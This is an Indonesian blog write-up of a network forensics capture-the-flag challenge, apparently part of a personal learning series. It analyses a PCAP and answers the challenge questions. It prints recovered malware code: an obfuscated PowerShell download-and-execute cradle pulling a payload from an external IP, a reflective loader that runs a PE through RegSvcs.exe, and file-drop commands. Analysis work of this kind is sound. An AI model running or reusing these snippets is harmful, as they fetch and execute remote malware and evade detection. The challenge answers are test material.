Challenge Semalam Belajar Tanpa AI - Day 2

Deskripsi

Lanjut ngab, hari ini mau bljar apa yach???? Kyk e blue team aja ga sih? Atau main server aja ya. Ya ga jauh jauh dari 2 itu si. Oiya, gw udah bikin semboyan nih tidak ada yang pasti, project mangkrak urusan nanti. Aowkaokwoakwoakwoakw

Network Forensics

Jadi gw bakal ngerjain salah satu challenge network forensic di sebuah platform.

Skenario :

A compromised machine has been flagged due to suspicious network traffic. Your task is to analyze the PCAP file to determine the attack method, identify any malicious payloads, and trace the timeline of events. Focus on how the attacker gained access, what tools or techniques were used, and how the malware operated post-compromise.

Initial Network Analysis

Di sini saya akan menggunakan Wireshark sebagai toolsnya, pertama saya membuka file pcapnya, setelah itu saya membuka Statistics -> Protocol Hierarchy Untuk melihat informasi protokol yang terjadi dalam file pcap tersebut. Dan berikut adalah isinya :

/posts/blog/challenge-no-ai/day2/1.png

Dari data tersebut, kita mengetahui bahwa :

  1. 99.9% Data berupa TCP
  2. Hanya terdapat 4 HTTP Packet

Setelah itu saya mencoba untuk melihat HTTP Traffic. Yang pertama ada request GET ke /xlm.txt

Pasted%20image%2020250802003551.png

Malicious .txt File

Kalau traffic tersebut kita lakukan follow ke HTTP Streamnya, akan mengarahkan ke isi dari file xlm.txt tersebut. Isinya berupa sebuah payload yang sudah diobfuscate (isinya diacak atau dipisahkan agar tidak mudah terdeteksi). Berikut adalah isinya :

Pasted%20image%2020250802003948.png

Deobfuscate

Setelah itu saya lakukan deobfuscate untuk mengetahui apa malicious code dari file ini.

[BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.126.209.4:222/mdm.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

Program di atas masih sedikit terobfuscate, saya akan coba untuk mengembalikan ke dalam bentuk aslinya.

IeX(NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('http://45.126.209.4:222/mdm.jpg')

Akhirnya berhasil kita pecahkan, dari payload ini kita bisa mendapatkan informasi bahwa :

  1. URL-nya adalah 45.126.209.4:222
  2. Nama file malwarenya adalah mdm.jpg
Question 1 : The attacker successfully executed a command to download the first stage of the malware. What is the URL from which the first malware stage was installed?

Answer : http://45.126.209.4:222/mdm.jpg

URL Information

Setelah itu kita coba cari untuk detail informasi dari URL tersebut, bisa pake whois Berikut hasilnya :

Pasted%20image%2020250802014759.png

Question 2 : Which hosting provider owns the associated IP address?

Answer : reliablesite.net

.jpg File Analysis

Untuk melakukan analisis file mdm.jpg, kita perlu untuk melakukan follow HTTP Stream pada traffic yang melakukan GET /mdm.jpg. Berikut adalah isinya :

Pasted%20image%2020250802015233.png

Terlihat pada depan sendiri ada $hexString_bbb yang menandakan bahwa text panjang tidak jelas ini merupakan sebuah hexadecimal, untuk analisisnya kita pake aja cyberchef.

Sha256sum

Jadi di mdm.jpg ini ada 2 hex, yang pertama hexString_bbb ini program loader, dan yang kedua hexString_pe ini program portable executablenya. Nah yang perlu kita analisis dan dapatkan shasumnya yaitu yang loader karena itu malwarenya.

Copy aja isi dari hexString_bbb, isinya aja, string dan nama variabelnya tidak usah, setelah itu pada tab kiri pilih from hex, dan sha2, lalu sha2nya pilih yang 256 seperti pada gambar di bawah ini :

Pasted%20image%2020250802020941.png

Kita berhasil mendapatkan sha256sumnya yaitu : 1eb7b02e18f67420f42b1d94e74f3b6289d92672a0fb1786c30c03d68e81d798.

Question 3 : By analyzing the malicious scripts, two payloads were identified: a loader and a secondary executable. What is the SHA256 of the malware executable?

Answer : 1eb7b02e18f67420f42b1d94e74f3b6289d92672a0fb1786c30c03d68e81d798

VirusTotal Analysis

Nah kan udah didapetin nih sha256sumnya, setelah itu masuk aja ke virustotal, dan masukkan sha256sum ke kolom pencarian.

Pasted%20image%2020250802023712.png

Kalau dari Alibaba, malware ini dilabeli sebagai

Untuk memeriksa informasi detail dari malware ini, masuk ke Tab Details.

Pasted%20image%2020250802023915.png

Malware ini dibuat pada 2023-10-30 15:08:44 UTC

Question 5 : What is the timestamp of the malware's creation?

Answer : 2023-10-30 15:08

Next mdm.jpg analysis

Nah kan tadi kita udah analisis dari hex loadernya, dan di bagian bawah dari hexnya ada kayak script gitu, script tersebut gunanya untuk melakukan process execution, berikut adalah scriptnya :

Sleep 5
$HM = 'L###############o################a#d' -replace '#', ''
$Fu = [Reflection.Assembly]::$HM($pe)

$NK = $Fu.GetType('N#ew#PE#2.P#E'-replace  '#', '')
$MZ = $NK.GetMethod('Execute')
$NA = 'C:\W#######indow############s\Mi####cr'-replace  '#', ''
$AC = $NA + 'osof#####t.NET\Fra###mework\v4.0.303###19\R##egSvc#####s.exe'-replace  '#', ''
$VA = @($AC, $NKbb)

$CM = 'In#################vo################ke'-replace '#', ''
$EY = $MZ.$CM($null, [object[]] $VA)

Dari beberapa deklarasi di atas, terlihat bahwa script ini mencoba untuk mneyembunikan sebuah string yang berisi sebuah path file.

Question 6 : Which LOLBin is leveraged for stealthy process execution in this script? Provide the full path.

Answer : C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Script ini juga melakukan write terhadap beberapa file, seperti di bawah ini :

[IO.File]::WriteAllText("C:\Users\Public\Conted.ps1", $Content)

[IO.File]::WriteAllText("C:\Users\Public\Conted.bat", $Content)

[IO.File]::WriteAllText("C:\Users\Public\Conted.vbs", $Content)

Dan tibalah pada pertanyaan terakhir

Question 7 : The script is designed to drop several files. List the names of the files dropped by the script.

Answer : Conted.ps1, Conted.vbs, Conted.bat

Kesimpulan

Alhamdulillah akhirnya selesai juga waktunya tidur

0%